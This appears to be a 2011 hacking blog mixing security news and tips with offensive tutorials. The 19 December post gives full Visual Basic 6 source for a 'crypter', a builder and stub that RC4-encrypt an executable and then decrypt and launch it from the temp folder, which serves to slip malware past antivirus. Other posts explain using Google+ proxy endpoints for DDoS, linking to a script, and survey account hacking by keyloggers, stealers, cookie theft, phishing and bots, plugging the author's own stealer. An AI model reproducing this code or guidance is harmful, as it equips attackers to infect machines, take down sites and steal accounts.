Saturday 31 December 2011


HOW TO SEE SOMEONE'S FACEBOOK ALBUMS WITHOUT ADDING HIM/HER ON FACEBOOK

guys heres the best trick for u to view all the pics of the person you want to see i found and tried it myself so njoy nd keep on reading this page



after the "id=" type the id of the person whose pics u wish to see
try this and watch the magic

Friday 30 December 2011


Common techniques that describes "How Hackers Hack(Exploits) a website" ?.. .



Do you know How Hackers Hack(Exploits)a website?, see some interesting facts about hackers paranormal (Ghost) Activities. Hackers are with tons of mechanisms attack, they decide the one most appropriate to vulnerability. Its organized plan to exploit.


Hacking Web Sites includes the type of attacks given under:
Learn hosting server details and its operating system: The hacker first examines the details of the server, which he is going to hack, first most important is the operating system on it, and its type. By using port scan, detects all available ports to attack.
Analysis the website: The hacker analyses the website for possible loopholes which are possible to exploit. Loopholes are like online feedback or inquiry forms which generally uses GET and POST variables, can be easily used by hackers. He also checks authentication method used on web pages for any probability of accessing the web server. A good hacker will always walk through nearly every interactive part on a website to achieve right of entry to the server. The hacker also goes throughout the developed script to test for any development glitches which are easy to exploit.
Existence of input validation: It consists of the validation which is used by many websites to decide whether particular information is secure and validated. Unsafe info is discarded. Negligence in input validation is a major way in for hackers.
Build up the attack: After investigative the entire situation, from the server to the website, and separating all the loopholes, the hacker builds the attack.
Website hacking Tricks used by hackers
There are so many techniques of hacking used by hackers, following are couple of them explained in details.
SQL injection: The hacker executes on SQL queries to the database on the database server through Website. Either SQL commands are executed in the feedback, contact us form fields or queries are inserted into expected parameters.
Cross-site scripting: Inserting malicious info to dynamic pages. Websites with static pages can control user interface as they are read-only. With CSS vulnerability hacker can then transmit the user’s private data to another server.
Directory traversal attacks: the ../ (dot dot slash) attack.The Web site is controlled to allow right to use files on the server. For example, suppose the value includes the path of a specific file. Placing ../ at the start of the parameter value makes the application to right of entry in the parent directory. On a series of ../ gives the root directory can be entry.
Authentication attacks: The hacker looks for legitimate authentication for entry from a Web site to server.
Directory listing: examine the website’s complete directory arrangement; the hackers look for out hidden directories, which could have administrative information, finding valuable input for attacks.


Thursday 29 December 2011


Researchers Discover Leaks In Pre-Installed Android Apps [News]

You may have heard about a recent surge in Android malware. Still, that malware comes in the form of apps. So long as you watch your permissions, you’re fine. Right?
Wrong. Every Android phone comes with some pre-installed apps, and some more than others. A group of researchers at North Carolina State University were interested to know if these apps, which often can’t be uninstalled by the user, contain security flaws. Eight phones were tested including three from HTC (Legend, EVO 4G, Wildfire S), two from Motorola (Droid and Droid X), the Samsung Epic 4G and Google’s Nexus One/S.




All of the phones were found to have security issues due to pre-installed apps. The most serious of these flaws are capability leaks that allow third-party apps to exploit an interface or service in use by another app without making a permission request of its own. Researchers found it would be possible for malware to wipe out data, send SMS messages, and obtain geo-location data by exploiting pre-installed apps.
What can you do to protect yourself from this threat? The researchers don’t provide any help there, though to their credit, they did contact the companies whose phones they exploited in an attempt to provide them with information.
Since these pre-installed apps often can’t be uninstalled by default, the only complete solution is to root your phone and install a custom ROM. However, as the researchers note in their paper, there is no reason why third-party apps could not contain the same flaws they found in the pre-installed apps they researched.
If you’d like the full story, the paper is currently public. Just be warned – it’s not written for the layman.



Source-author: Matt Smith

Wednesday 28 December 2011

Want to become android hacker than wait and watch !!



whose who own Android gadgets will soon be able to break into networks and computers for real. That’s because Israeli security firm zImperium is about to launch an app that can search for vulnerable targets and infiltrate them, allowing users to eavesdrop or even “attack” the devices.
The app is called Anti, short for Android Network Toolkit. It was introduced by zImperium at last week’s Defcon hacking conference, and reportedly impressed several attendees for its ease of use and affordability. With Anti, a user can infiltrate Windows machines, devices running an unspecified older version of Android and yes, even iPhones.

Anti will offer a wi-fi-scanning tool for finding open networks and showing all potential target devices on those networks, as well as traceroute software that can reveal the IP addresses of faraway servers. When a target is identified, the app offers up a simple menu with commands like “Man-In-The-Middle” to eavesdrop on local devices, or even “Attack”; The app is designed to run exploits collected in platforms like Metasploit or ExploitDB, using vulnerabilities in out-of-date software to compromise targets. Anti will debut at the Android Market next week as a free app that can be upgraded for $10 (USD).(lator on I’ll  tell you how it can be updgraded)
The app raises the possibility of dangerous, stealthy attacks. A hacker could, for instance, walk into a coffee shop or a corporate office with his phone and start sussing out machines for data theft or malware infection. But Avraham says Zimperium will ask users in its terms of service to limit their hacking to “white hat” penetration testing.
I’m sure you’re wondering why Google would approve such an app. The answer lies in zImperium’s trade – security. The idea is to use Anti to detect weaknesses in a network or machine so that they can be patched or fixed. But even zImperium knows that Anti can cause serious damage in the wrong hands. The company left a note in the app saying, “Please remember, with great power comes great responsibility. Use it wisely.”Right.


Tuesday 27 December 2011


Download Any Torrent File With IDM (Fully Solved) 



Download Any Torrent File With IDM (Fully Solved)
follow Easy Steps:
1. First of all , you have to download the torrent file(.torrent) which you want to download.

2. Then just go to the website http://www.torcache.net and upload the torrent file that you have just downloaded and click on the cache! button.
 
3. This will give you a new torrent file. You just have to copy the link of the new torrent file from the opened window.
 
4. Then go to the website http://www.torrific.com and create an account there(in case you don’t have) and login to your account. Then paste the address of the new torrent obtained in step 3 and click on Get button.
 
5. Now you will get the list of available files present in that torrent file. Then click on the initiate bittorrent transmission button. This will give the full option to download the file. Just click on any link and you can see the download manager-IDM popping out for downloading the file.
 
Now enjoy the ultimate Speed of IDM for downloading torrents too…
Please comment this, if you liked it...
 

Monday 26 December 2011


How a Typical Facebook Scam Works?

If you have been on Facebook for a decent amount of time, you may have definitely come across videos posts on your news wall that have an enticing title and an innocent thumbnail but upon clicking, the link takes you a scam website.
How do such scams happen on Facebook and why do they go viral so quickly? If a trusted friend is sharing such links with your, does that mean her Facebook account is hacked or does she have a virus on her computer that is quietly posting these dangerous links on her behalf? Not really.
Matt Jones, who works with the Data & Security team at Facebook, has recorded an informative screencast video where he walks you through the various type of scams that happen on Facebook.com and why do they happen. Most scams require Facebook users to copy-paste some JavaScript code into the browser's address bar and as soon as they do that, the rogue post is automatically published to the walls of all their Facebook friends.


Facebook Scams and XSS

Interestingly, according to Matt, Google Chrome and Safari are the only browsers that are susceptible to this kind of cross-site scripting (XSS) vulnerability while IE and Firefox are relatively safe. And since the malicious JavaScript code is often hidden inside Flash videos, Facebook isn’t able to detect it. Maybe the solution is that they allow video embeds from trusted websites.

Countermeasures:

Tips to avoid facebook scams are below..
1. Most of the facebook scams are of the form of some videos. So avoid to click on such video link without verifying. if you don,t the person who posted the video link on your wall. So avoid to click such kind of video.

2. Try BitDefender safego


3.Scans your facebook for privacy holes with reclaim privacy.-ReclaimPrivacy.org 



4. If you believe you have already fallen victim to the Facebook phishing scam, simply log in and change your password. Other wise try to change your facebook password once a month to Avoid Facebook Scams


Sunday 25 December 2011


 What You Need To Know About Android Tablet Security..

As tablets become more popular, they’re serving as stand-ins for computers for some users. Although most people still own a PC, tablets are particularly nice for web browsing and online video, making them common couch-side companions.
This, however, could introduce some issues. If tablets are being used like computers, they could be exposed to the same threats. Which begs the question – how can you deal with Internet security on your Android tablet?

Permissions – Like The Phones

The entry to understanding Android on any device is permissions, and in this respect Android tablets work much like the phones. Heck, this same system isn’t even Android exclusive – Google has already adapted the same idea to Chrome extensions and web apps.


Permissions are very simple. Before you download an app, you are given a list of permissions that app requests of your device. These are not optional – if you download the app, you are agreeing to the permissions. Once permission is given, it can’t be revoked unless you uninstall the app.
You therefore need to be very careful about what you download. Reading permissions can seem annoying – but do it anyway. An app that is malicious can easily get up to mischief without you knowing, and while such instances in the real world remain limited, they do exist.

Downloading An Antivirus App Is A Good Idea

As I point out in virtually every Android Internet security article, antivirus apps for the platform remain a bit of an open question. Comprehensive, objective tests of their ability to defend again threats remain rare.
However, a recent A/V Comparatives study did show that most security apps were able to protect against a test selection of malware threats, and the study goes so far as to recommend that all Android users install antivirus software.

Which one should you download? I’m a fan of Kaspersky’s Tablet Security, and recommend it as a first choice, but does require a pricey $20/year subscription. That may seem like a lot, and if you want free, Lookout Mobile Security can work well – but keep in mind that the app’s $2.99/month premium option totals to almost $36/year.

Treat It Like A Laptop

When it comes to network security, tablets are much like laptops. They almost always connect to the Internet via Wi-Fi, and are subject to all the security risks that results from that. Fortunately, your Android tablet supports secured wireless connections, and that’s a feature you should always use whenever possible. The issue which is of concern is the chance that a hacker will be able to obtain your browsing data if you use an unsecure connection, and it applies to tablets just as with laptops.
One useful feature is Android’s built-in VPN support, which you’ll find in your tablet’s settings. Just enter the VPN address and your username/password for it, and you’re off! You can use this with many VPN services to provide yourself with secure browsing over unsecured networks.

Use Honeycomb’s Encryption

Android has not been particularly popular with enterprise users because of a general lack of focus on enterprise security, but there has been some inroads made in that direction, one of which is the encryption feature on Honeycomb tablets.



Conclusion

Security for tablets is far from mature, just as the threats that may exploit a tablet are far from mature. There is some degree of security via obscurity available as of now, as many website exploits and viruses simply won’t work against tablets. That’s not going to last forever though. Security threats will become more and more common as the devices themselves become more and more popular. This process will take many years, but hey – it certainly doesn’t hurt to have a head start.




Source-author:Matt Smith


Saturday 24 December 2011


How to install tor in backtrack 4 

Tor is mainly used for anonymous surfing. personaly i feel that it is better than among other proxy tools but not the best you can try it on backtrack ..
you’ve been checking out BackTrack 4, and you want to get your anonymity on? This is assuming you have either installed BT4 to your hard drive or you’re using the VMWare version. You can do this on a LiveCD too of course, but your changes won’t stay unless you do some fancy lzm voodoo and burn a new copy of your CD.



First, you need to add noreply.org repositories to your sources.list. These are the official tor repositories for debian-based Linux distrobutions. Open up a terminal and type:

Code:

nano /etc/apt/sources.list

At the bottom of this file, add these two lines:

Code:

deb http://mirror.noreply.org/pub/tor intrepid main
deb-src http://mirror.noreply.org/pub/tor intrepid main

Save the file. Now download the gpg key, and check the fingerprint:

Code:

gpg --keyserver subkeys.pgp.net --recv 94C09C7F
gpg --fingerprint 94C09C7F

The fingerprint should look like this:

Code:

pub 1024D/94C09C7F 1999-11-10
Key fingerprint = 5B00 C96D 5D54 AEE1 206B AF84 DE7A AF6E 94C0 9C7F
uid Peter Palfrader
uid Peter Palfrader
uid Peter Palfrader
uid Peter Palfrader
uid [jpeg image of size 7974]
sub 1024D/AFA44BDD 2003-07-09 [expires: 2010-07-18]
sub 2048g/E8F4A328 2003-07-09 [expires: 2010-07-18]

Then add it to your apt-key ring by doing this:

Code:
gpg --export 94C09C7F | sudo apt-key add -

Now update your sources, and install tor and privoxy.

Code:
apt-get update
apt-get install tor privoxy

When this is done you’ll need to change a couple of privoxy settings. In a terminal, edit the privoxy config file:
Code:
nano /etc/privoxy/config

Add this line to the top (including the period at the end):
Code:
forward-socks4a / 127.0.0.1:9050 .
Now we need to disable logs. Find the line “logfile logfile” and add a # at the beginning to comment it out (tou can search a file in nano with ctrl-W). You may want to search file the line “jarfile jarfile” and make sure that’s commented out too, but it already is for me. Now exit nano and restart the privoxy service:

Code:
/etc/init.d/privoxy restart
Now head on over to the Torbutton Firefox addon page , install Torbutton, and restart Firefox.
Now head over to the tor detection page . It should tell you that you’re not using tor. Click the tor button in the bottom right corner of Firefox, accept the sad fact that you might leak time zone data, and then press enter in the address bar to reload the page. Note that you can’t just hit refresh, because you need to make sure firefox is opening a new socket it check.torproject.org. If all is well, you see the bright green notice “Congratulations. You are using Tor.”

Go forth and be anonymous.


Friday 23 December 2011


What Is PPPoE and bridge mode of ADSL Modem

There are two ways to configure an ADSL modem for broadband connection. One in PPPoE (Point to Point Protocol over Ethernet) and the another is Bridge mode.
PPPoE Mode
In this mode the modem works as router and the PPPoE session terminates on WAN port of router. The PPPoE client is in built in the modem and allocated by BRAS server gets assigned to WAN port of modem. The Internal network has to use the private IP and for Internet access NATing happens in modem. In PPPoE mode the modem is configured in such a way that the user id and password are stored inside the Modem. Internet connection will be established as you switch on the ModemPPPoE Mode
Bridge Mode
In this mode the modem works as transparent Ethernet bridge and therefore you need to run the PPPoE client software ( for login authentication) on your PC/server. WIN XP systems have this feature inbuilt but for other operating systems you need to buy it from market. Some freeware like RASPPPoE, Enternet etc. are also available on the Internet
bridge mode
Both the modes can be used as per the requirement and application. Here enumerating the main differences
PPPoE mode
1. User id and password stored inside the Modem.
2. Multiple PCs can be connected. For example most of the basic ADSL Modems having at least one ADSL port and one USB port. In PPPoE mode, can connect one PC to Ethernet port and one PC to USB port which enable simultaneous internet usage in both the PCs.
3. PPPoE mode is more secured.
4. For Torrents download, appropriate ports need to be forwarded.
Bridge Mode
1. In bridge mode user id and password to be entered in the dialer of computer.
2. Only single PC can be connected.
3. For torrents download port forwarding is not required.
4. Less secured because all the ports are open need good firewall to avoid virus infection.


Thursday 22 December 2011


How DDOS using GOOGLE PLUS servers

A security penetration tester at Italian security firm AIR Sicurezza Informatica has claimed that flaws exist in Google's servers that will allow would-be hackers to exploit the search giant's bandwidth and launch a distributed denial-of-service (DDoS) attack on a server of their choosing.

On the IHTeam Security Blog, Simone Quatrini, also known as R00T.ATI, demonstrates how users can make Google's servers act as a proxy to fetch content on their behalf. Quatrini has written a shell script that will repeatedly prompt Google's servers to make requests to a site of the attacker's choice, effectively using Google's bandwidth rather than their own. The advantage of using Google and make requests through their servers, is to be even more anonymous when you attack some site (TOR+This method); The funny thing is that apache will log Google IPs. But beware: gadgets/proxy? will send your ip in apache log, if you want to attack, you’ll need to use /_/sharebox/linkpreview/.

How does it work?


The vulnerable pages are “/_/sharebox/linkpreview/“ and “gadgets/proxy?“
Is possible to request any file type, and G+ will download and show all the content. So, if you parallelize so many requests, is possible to DDoS any site with Google bandwidth. Is also possible to start the attack without be logged in G+. If anything, Google will notice [attack attempts] and probably blacklist you.


Download-source-Code: http://www.ihteam.net/advisories/_154785695367_+ddos.sh



 


Wednesday 21 December 2011

Part 2: Server Side
Want to know about website account hacking ,don't know where to start !!


we have already discussed about client side hacking now we'll discuss


Server Side Hacking






1) Exploiting : Exploiting means finding a vulnerability and using it to your advantage. There are various publically disclosed vulnerabilities and exploits that you can simply search on google and HC. There are ways to exploit a server the most common ones are

1) XSS Cross Site Scripting,
2) RFI, LFI
3) Uploading Shells
4) SQL Injections
5) CSRF
6) Gaining Root Access to websites hosted on the same server and then intruding another site on the server.
7) Using Scripts to gain information known as Exploits.

These methods are very vast and cannot be explained in a few lines so I am not explaining them in this guide.


2) Bruteforce Attack : Bruteforcing is using a bruteforcer software to try combinations of words, numbers and symbols to fetch the login of your victim. But this rarely works and you need to have a powerful computer.


3) Reverting Accounts : Here we are fooling the website servers that we are the authorized user and we are the holder of an account. One of this vulnerability exists in Hotmail and existed in Facebook. Users just supplied some information about the clients such as last accessed ip address, contacts on contact list, date of birth, location, etc. With a bit of SE its not that hard to extract such information from the client.

Tuesday 20 December 2011


Want to know about website account hacking ,don't know where to start !!

Ok now that you have my attention :lp: Please read this guide that will burst your bubble, beginner hackers. I am sorry for that.

You CANNOT hack emails or websites with just one or two clicks with some email hacking apps. You need to have proper information about the person that you are hacking. If you see sites that claim that they can hack email accounts within minutes and charge hundreds of dollars for it, just laugh at them and move on. Do not waste money on them as they will be just scamming you.

There are two ways to hack Accounts of a Website.
1) Client  Side hacking 


2) Server Side hacking (we'll dicuss it latter)




*Client Side Hacking

This method can be done depending what you choose. Client side hacking is basically hacking the person's pc and extract information. Antiviruses will detect the apis, assemblies, etc and prevent you from infecting them. In this case you need

1) Keylogging : This basically taps all the keystrokes that users type. When user types password you get it. The victim requires to execute the keylogger "server" file in order to be infected.

2) Password Stealing : Here you steal password saved on user's pc. Browsers often save passwords to provide quick login to the user, but this can be harmful sometimes. Here same as keyloggers you need to execute a file on client pc. You can use combination of keylogger and password stealers, such as my Emissary Keylogger/Stealer.

3) Cookie Stealing : Here you are stealing cookies of the user. Cookies can be used to auto login as they hold information about the account.

4) Remote Administration Tools : These tools are very dangerous and give you full control of a computer. You can view webcams, desktops live, transfer and download files.

5) Social Engineering : Social Engineering is nothing but fooling someone to download your malware or extracting sensitive information from them.
One of the methods is this : Hacking Accounts through SE.


6) Phishing Attacks : Phishing is creating fake login pages similar to that of a website's login page and then fooling the person to enter their username and password into the login box. The triggered php scripts shall send the entered passwords to your log file.

7) Zombies/Bots : This is like keylogging and pass stealing if victim executes your malware he she can be infected with a bot. A bot will connect them to your irc channel or host server and make them your "Zombie". You can do whatever you want with them.

That covers the client part.


Recover Deleted Files on Android Phone with Undelete

There are many instances where we might have deleted files and photos accidently or due to any program or application crashes. There are many free apps for Windows which can recover deleted files like Power Data Recovery, Restore Deleted Files Now, RecoveryDesk etc. Now we have a nice app for Android phone, called Undelete, which can recover deleted files on your Android phone. Undelete for Android is an application which works on rooted phones and allows users to recover deleted files on your SD card and internal storage.

 


Features;
  • Supports FAT
  • Extremely fast scanning logic
  • Restore any file that has not been written over
  • Works with images, video, music, archives and binaries
  • Cool minimal UI
The app is currently in beta and available free of cost in Android market. The app has been tested on Android phones like Incredible S, Nexus S, Xoom, Transformer, Sensation, Galaxy S I/II, Galaxy Ace, Desire. But it should work on Android phones with version 2.1 and up.
Download Undelete [Via XDA Developers]



Monday 19 December 2011

Already know what is Crypter than wait but know !!! how to make it on your own without any third person software ?
Solution:
Requirement:
 

  • Visual Basic 6 or Visual Basic 6 Portable
  • A RC4 module
  • A brain

The RC4 module and Visual Basic 6 Portable will have the download links at the end of this tutorial.

TABLE OF CONTENTS:
1. Introduction
2. Building your crypter
3. Conclusion


1. Introduction

RC4:
In cryptography, RC4 (also known as ARCFOUR or ARC4 meaning Alleged RC4, see below) is the most widely used stream cipher and is used in protocols such as Secure Sockets Layer (SSL) (to protect Internet traffic) and WEP (to secure wireless networks).

Stub:
A method stub or simply stub in software development is a piece of code used to stand in for some other programming functionality. A stub may simulate the behavior of existing code (such as a procedure on a remote machine) or be a temporary substitute for yet-to-be-developed code. Stubs are therefore most useful in porting, distributed computing as well as general software development and testing.

Builder:
A builder is usually the client to make/do something to a file, and it is supposed to go with a stub. The builder usually allows the stub to simulate the behaivor of existing code, and than it makes the file/does something to a file.

2. Building your crypter.

Now, open up Visual Basic 6 or Visual Basic Portable. To make the task easier, open two Visual Basic 6 programs. One is going to be the builder, and one is going to be the stub.

Now, lets start on the builder. Add a RC4 module, and lets go on. First of all, add one label that says "File Path:", a text box right beside "File Path:", a button that says "Browse" or "...", and another button that says "Crypt" or "Build". Now, lets add the CommonDialog control. Add a CommonDialog and name it commondlg. Now, lets double click the button that says "Browse" or "...". Add this code, and I'll explain it.


Code:
With commondlg 'CommonDialog1.
     .Filter = "Executable files | *.exe" 'The file used for crypting. (*.exe)
     .DialogTitle = "Please select a executable file..." 'The title of the dialog.
     .ShowOpen 'Show the dialog.
     End With
     TextBox1.Text = commondlg.FileName 'Make TextBox1.Text as the selected filename.

The With commondlg command calls CommonDialog1.
The .Filter part allows you to choose what files you only want to be selected.
The .DialogTitle command is the title of the dialog (the prompt that tells you which file you want to select for crypting).
The .ShowOpen command shows the dialog.
End With will end CommonDialog1.
And finally, the TextBox1.Text = commondlg.FileName command makes TextBox1.text show the selected filename.

Now, click the button that says "Build" or "Crypt". Add this code. It explains it, so please take time to read what it says.
Code:
Dim sStub As String, sFile As String 'This command will declare the two strings.
Open App.Path & "\stub.exe" For Binary As #1 'Opens up the stub.
sStub = Space(LOF(1)) 'This declares the space.
Get #1, , sStub 'This puts in a space in the file.
Close #1 'This closes the file.

Open TextBox1.Text For Binary As #1 'Opens up the stub.
sFile = Space(LOF(1)) 'This declares the space.
Get #1, , sFile 'This puts a space in the file.
Close #1 'This closes the file.

Open App.Path & "\output.exe" For Binary As #1 'This creates the crypted file as "output.exe".
Put #1, , sStub & FileSplit & RC4(sFile, Pass) 'This adds the option FileSplit and the RC4 option.
Close #1 'This closes the file.

MsgBox ("File crypted successfully!") 'This is the prompt to show the message that the program successfully crypted the file.

Now, you might have an error that will show you that FileSplit and Pass is not declared. To do so, we will add the declarations on the top of the coding.
Code:
Const FileSplit = "<@#@>" 'The file split.
Const Pass = "s0rasRC4Tutorial" 'The RC4 password.

For this tutorial, we will be using "s0rasRC4Tutorial" as the RC4 password.

Now, lets start on the stub. Add the RC4 module, and make a new module called modMain. Add this code in modMain:
Code:
Const FileSplit = "<@#@>" 'The file split.
Const Pass = "s0rasRC4Tutorial" 'The RC4 password; It must be the same as the one on the builder!

Public Declare Function ShellExecute Lib "Shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpszOp As String, ByVal lpszFile As String, ByVal lpszParams As String, ByVal LpszDir As String, ByVal FsShowCmd As Long) As Long 'Calls the ShellExecute command.

Public Sub Main() 'The main part of the stub.
Dim sStub As String, sFile As String 'This will declare the strings again, just like we did on the builder.
Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1 'Opens up the selected .exe file.
sStub = Space(LOF(1)) 'This will declare the space.
Get #1, , sStub 'This puts a space in the file.
Close #1 'This closes the file.

sFile = Split(sStub, FileSplit)(1) 'This will split the file and the stub.
Open Environ("tmp") & "\decrypted.exe" For Binary As #1 'This will make a decrypted file in the RC4 folder.
Put #1, , RC4(sFile, Pass) 'This will add the RC4 password to the file with the selected RC4 password.

Call ShellExecute(0, vbNullString, Environ("tmp") & "\decrypted.exe", vbNullString, vbNullString, 1) 'Calls the ShellExecute command and drops the decrypted file in the temporary files folder.

End Sub 'This ends "Public Sub Main()".

The code will be teaching you. Once you're done, remove the Form1.

3. Conclusion
I hope you liked this tutorial, and I hope you learned a lot about crypting with RC4!

Visual Basic 6 Portable: http://www.mediafire.com/?tgicg4hn1n5
RC4 module: http://www.freevbcode.com/ShowCode.asp?ID=4398


Sunday 18 December 2011


 Proxy Detection Services 

So in order to stop such online frauds, Proxy Detection has become a critical component. Today most companies, credit card merchants and websites that deal with e-commerce transactions make use of Proxy Detection Services like MaxMind and FraudLabs to detect the usage of proxy or spoofed IP from users participating online.
Proxy Detection web services allow instant detection of anonymous IP addresses. Even though the use of proxy address by users is not a direct indication of fraudulent behaviour, it can often indicate the intention of the user to hide his or her real IP. In fact, some of the most used ISPs like AOL and MSN are forms of proxies and are used by both good and bad consumers.

How Proxy Detection Works?
Proxy detection services often rely on IP addresses to determine whether or not the IP is a proxy. Merchants can obtain the IP address of the users from the HTTP header on the order that comes into their website. This IP address is sent to the proxy detecting service in real time to confirm it’s authenticity.
The proxy detection services on the other hand compare this IP against a known list of flagged IPs that belong to proxy services. If the IP is not on the list then it is authenticated and the confirmation is sent back to the merchant. Otherwise it is reported to be a suspected proxy. These proxy detection services work continuously to grab a list or range of IPs that are commonly used for proxy services. With this it is possible to tell whether or not a given IP address is a proxy or spoofed IP.

How to Tell Whether a given IP is Real or a Proxy?
There are a few free sites that help you determine whether or not a given IP is a proxy. You can use free services like WhatisMyIPAddress to detect proxy IPs. Just enter the suspected IP in the field and click on “Lookup IP Address” button to check the IP address. 

Enable built-in admin account in windows 7

==============
1. Click Start, click "All Programs", please find and open "Accessories" folder.
2. Please right-click on "Command Prompt" item and select "Run as administrator".
3. Please type the following command line in to the coming window.

net user administrator /active:yes
==============


Note: There is a space between "Administrator" and "/active:yes".

Saturday 17 December 2011


How to Detect Anonymous IP Addresses


As the fraudsters are now becoming more sophisticated in bypassing the Geo-location controls by using proxies (Anonymous IPs) to spoof their IP address, it has become very much necessary to come up with a means for detecting the proxies so that the authenticity of the users can be verified. Using a proxy (web proxy) is the simplest and easiest way to conceal the IP address of an Internet user and maintain the online privacy. However proxies are more widely used by online fraudsters to engage in cyber crimes since it is the easiest way to hide their actual Geo-location such as city/country through a spoofed IP address. Following are some of the examples where fraudsters use the proxies to hide their actual IP.

1. Credit Card Frauds
For example, say a Nigerian fraudster tries to purchase goods online with a stolen credit card for which the billing address is associated with New York. Most credit card merchants use Geo-location to block orders from countries like Nigeria and other high risk countries. So in order to bypass this restriction the credit card fraudster uses a proxy to spoof his IP address so that it appears to have come from New York. The IP address location appears to be legitimate since it is in the same city as the billing address. A proxy check would be needed to flag this order.

2. Bypass Website Country Restrictions
Some website services are restricted to users form only a selected list of countries. For example, a paid survey may be restricted only to countries like United States and Canada. So a user from say China may use a proxy so as to make his IP appear to have come from U.S. so that he can earn from participating in the paid survey.

Friday 16 December 2011


How to Secure a Wireless Network from Hackers?

The reason we secure a wireless network is to stop people from using the services of our network who don't have permission to utilize them. It is harder to secure a wireless network from hackers as compared to a classic wired network. This is due to the fact that a wireless network can be accessed anywhere inside the range of its antenna.
In order to secure a wireless network from hackers, we should take proper steps to save ourselves against security issues. If you don't secure a wireless network from hackers, you might end up without its service. The consequence might also include the utilization of our network to attack further networks. To secure a wireless network from hackers, you should follow these simple wireless networking tips:

1. Strategic antenna placement:

The first thing you have to do is to position the access point's antenna in a place which restricts the range of its signal to go further than the required area. You should not put the antenna close to a window because glass can't obstruct its signals. Place it in a central location of the building.

2.Use WEP:

WEP stands for Wireless encryption protocol. It's a customary technique for encrypting traffic on a wireless network. You should never skip it as that will allow hackers to get instant access to the traffic over a wireless network.

3. Change the SSID, disable the broadcast of SSID:

SSID stands for service set identifier. It is the recognition thread utilized by the wireless access point due to which the customers are capable of starting connections. For every wireless access point arranged, select an exclusive as well as unique SSID. Also, if it's attainable, hold back the broadcast of the SSID out over the antenna. It won\t appear in the listing of offered networks, while being able to provide services as usual.

4. Disable DHCP:

By doing this, the hackers will have to decode the TCP/IP parameters, subnet mask as well as the IP address in order to hack your wireless network.

5. Disable or modify SNMP settings:

Change the private as well as public community settings of SNMP. You can also just disable it. Otherwise the hackers will be able to utilize SNMP to get significant info regarding your wireless network.

6. Utilize access lists:

For additional security of your wireless network, and if your access point support this feature, employ an access list. An access list lets us determine precisely which machinery is permitted to attach to an access point. The access points which include the access list can employ trivial file transfer protocol (TFTP) now and then in order to download modernized lists to steer clear of hackers.